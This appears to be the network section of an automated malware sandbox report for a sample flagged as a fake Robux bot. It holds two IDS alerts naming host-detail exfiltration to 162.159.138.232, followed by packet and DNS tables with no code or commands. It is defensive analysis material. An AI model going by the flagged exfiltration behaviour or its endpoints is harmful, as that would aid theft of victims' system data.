                                                                                                                        2024-10-15T15:53:10.691283+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.649983162.159.138.232443TCP
                                                                                                                        2024-10-15T15:53:18.245903+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.649997162.159.138.232443TCP
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Oct 15, 2024 15:52:13.610778093 CEST49711443192.168.2.6140.82.121.3
                                                                                                                        Oct 15, 2024 15:52:13.610877991 CEST44349711140.82.121.3192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:13.611002922 CEST49711443192.168.2.6140.82.121.3
                                                                                                                        Oct 15, 2024 15:52:13.644619942 CEST49711443192.168.2.6140.82.121.3
                                                                                                                        Oct 15, 2024 15:52:13.644658089 CEST44349711140.82.121.3192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:14.523323059 CEST44349711140.82.121.3192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:14.523446083 CEST49711443192.168.2.6140.82.121.3
                                                                                                                        Oct 15, 2024 15:52:14.623538017 CEST49711443192.168.2.6140.82.121.3
                                                                                                                        Oct 15, 2024 15:52:14.623596907 CEST44349711140.82.121.3192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:14.624680042 CEST44349711140.82.121.3192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:14.626461983 CEST49711443192.168.2.6140.82.121.3
                                                                                                                        Oct 15, 2024 15:52:14.631943941 CEST49711443192.168.2.6140.82.121.3
                                                                                                                        Oct 15, 2024 15:52:14.679410934 CEST44349711140.82.121.3192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:15.011701107 CEST44349711140.82.121.3192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:15.011821032 CEST49711443192.168.2.6140.82.121.3
                                                                                                                        Oct 15, 2024 15:52:15.012233973 CEST44349711140.82.121.3192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:15.012293100 CEST44349711140.82.121.3192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:15.012304068 CEST49711443192.168.2.6140.82.121.3
                                                                                                                        Oct 15, 2024 15:52:15.012361050 CEST49711443192.168.2.6140.82.121.3
                                                                                                                        Oct 15, 2024 15:52:15.209203959 CEST49711443192.168.2.6140.82.121.3
                                                                                                                        Oct 15, 2024 15:52:15.209244967 CEST44349711140.82.121.3192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:15.236212015 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:15.236252069 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:15.236327887 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:15.237098932 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:15.237112999 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:15.853382111 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:15.853476048 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:15.857980013 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:15.857992887 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:15.858329058 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:15.858388901 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:15.858812094 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:15.903405905 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.278604031 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.278712988 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.278793097 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.278846979 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.278862000 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.278903961 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.278909922 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.278951883 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.278956890 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.279000998 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.279006958 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.279062986 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.279247999 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.279290915 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.279314995 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.279359102 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.279364109 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.279413939 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.403116941 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.403201103 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.403247118 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.403283119 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.403286934 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.403337002 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.403359890 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.403455019 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.403485060 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.403491974 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.403539896 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.403565884 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.403572083 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.403618097 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.403928995 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.403985023 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.403990984 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.404037952 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.523467064 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.523549080 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.523567915 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.523583889 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.523613930 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.523647070 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.523648977 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.523658037 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.523691893 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.523700953 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.523741961 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.523749113 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.523797035 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.523816109 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.523864985 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.523869991 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.523914099 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.524327040 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.524384975 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.524389982 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.524416924 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.524437904 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.524468899 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.524492979 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.524513006 CEST44349712185.199.111.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:16.524523973 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:16.524574995 CEST49712443192.168.2.6185.199.111.133
                                                                                                                        Oct 15, 2024 15:52:34.933268070 CEST4979180192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:34.938119888 CEST8049791185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:34.939176083 CEST4979180192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:34.942439079 CEST4979180192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:34.947269917 CEST8049791185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:35.551342964 CEST8049791185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:35.553587914 CEST8049791185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:35.553644896 CEST4979180192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:35.554241896 CEST4979180192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:35.557990074 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:35.558027029 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:35.558099985 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:35.559063911 CEST8049791185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:35.565490961 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:35.565509081 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.182456970 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.182529926 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.190910101 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.190926075 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.191257000 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.201561928 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.247411013 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437628984 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437793970 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437832117 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437860966 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437890053 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.437913895 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.437928915 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.438405037 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.438477993 CEST44349797185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:36.438525915 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:36.759629965 CEST49797443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:54.322736979 CEST4989480192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.327624083 CEST8049894172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.327692032 CEST4989480192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.331157923 CEST4989480192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.336011887 CEST8049894172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.516369104 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:54.516422033 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.517225981 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:54.518043995 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:54.518071890 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.937272072 CEST8049894172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.939757109 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.939841032 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.940093994 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.943314075 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:54.943348885 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:54.985698938 CEST4989480192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.145740986 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.145824909 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.147535086 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.147559881 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.147820950 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.148788929 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.195399046 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.195447922 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.195453882 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.501302958 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.501425028 CEST44349898162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.501507044 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.577661037 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.577758074 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.580569983 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.580589056 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.580913067 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.583985090 CEST49898443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:52:55.587440968 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.635395050 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.733417034 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.733736038 CEST44349900172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.733923912 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.742352009 CEST49900443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:52:55.755759954 CEST4990680192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:55.760541916 CEST8049906185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:55.760626078 CEST4990680192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:55.760896921 CEST4990680192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:55.767967939 CEST8049906185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:56.401554108 CEST8049906185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:56.401870012 CEST4990680192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:56.402698994 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:56.402760983 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:56.402904034 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:56.403223991 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:56.403244972 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:56.407108068 CEST8049906185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:56.407603025 CEST4990680192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.080512047 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.080593109 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.082036972 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.082046986 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.082494974 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.083523035 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.131408930 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213059902 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213310957 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213419914 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213490009 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.213510990 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213541985 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213587999 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.213634968 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213854074 CEST44349911185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:52:57.213943005 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:52:57.271121025 CEST49911443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:02.058430910 CEST4993880192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.064198017 CEST8049938172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:02.064277887 CEST4993880192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.064939022 CEST4993880192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.069808006 CEST8049938172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:02.705881119 CEST8049938172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:02.737350941 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.737397909 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:02.738502979 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.744329929 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:02.744343996 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:02.751441956 CEST4993880192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.378603935 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.378679991 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.380146027 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.380156040 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.380553007 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.386852026 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.431410074 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.531838894 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.532058001 CEST44349944172.67.19.24192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.532110929 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.550281048 CEST49944443192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:03.569597006 CEST4995080192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:03.574527025 CEST8049950185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:03.574599028 CEST4995080192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:03.574775934 CEST4995080192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:03.580244064 CEST8049950185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.167843103 CEST8049950185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.167855978 CEST8049950185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.167962074 CEST4995080192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.168065071 CEST4995080192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.168950081 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.168987989 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.169590950 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.169877052 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.169895887 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.172987938 CEST8049950185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.840444088 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.840544939 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.845555067 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.845582962 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.846268892 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.847640038 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.891402960 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.976908922 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.976984024 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.977057934 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.977089882 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.977108955 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.977130890 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.977145910 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.979052067 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.979104996 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:04.979114056 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.986114979 CEST44349952185.199.109.133192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:04.987348080 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:05.007538080 CEST49952443192.168.2.6185.199.109.133
                                                                                                                        Oct 15, 2024 15:53:09.708997965 CEST49983443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:09.709044933 CEST44349983162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:09.709254980 CEST49983443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:09.709727049 CEST49983443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:09.709742069 CEST44349983162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:10.328188896 CEST44349983162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:10.328269958 CEST49983443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:10.329797029 CEST49983443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:10.329808950 CEST44349983162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:10.330133915 CEST44349983162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:10.331051111 CEST49983443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:10.371409893 CEST44349983162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:10.371469021 CEST49983443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:10.371484041 CEST44349983162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:10.691374063 CEST44349983162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:10.691708088 CEST44349983162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:10.691786051 CEST49983443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:10.698138952 CEST49983443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:15.717478037 CEST4989480192.168.2.6172.67.19.24
                                                                                                                        Oct 15, 2024 15:53:17.355307102 CEST49997443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:17.355341911 CEST44349997162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:17.355420113 CEST49997443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:17.355802059 CEST49997443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:17.355814934 CEST44349997162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:17.977066994 CEST44349997162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:17.977161884 CEST49997443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:17.978519917 CEST49997443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:17.978528023 CEST44349997162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:17.978868961 CEST44349997162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:17.979660988 CEST49997443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:18.023439884 CEST44349997162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:18.023525953 CEST49997443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:18.023541927 CEST44349997162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:18.245914936 CEST44349997162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:18.246030092 CEST44349997162.159.138.232192.168.2.6
                                                                                                                        Oct 15, 2024 15:53:18.246099949 CEST49997443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:18.252129078 CEST49997443192.168.2.6162.159.138.232
                                                                                                                        Oct 15, 2024 15:53:23.289105892 CEST4993880192.168.2.6172.67.19.24
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Oct 15, 2024 15:52:13.591018915 CEST5960353192.168.2.61.1.1.1
                                                                                                                        Oct 15, 2024 15:52:13.598275900 CEST53596031.1.1.1192.168.2.6
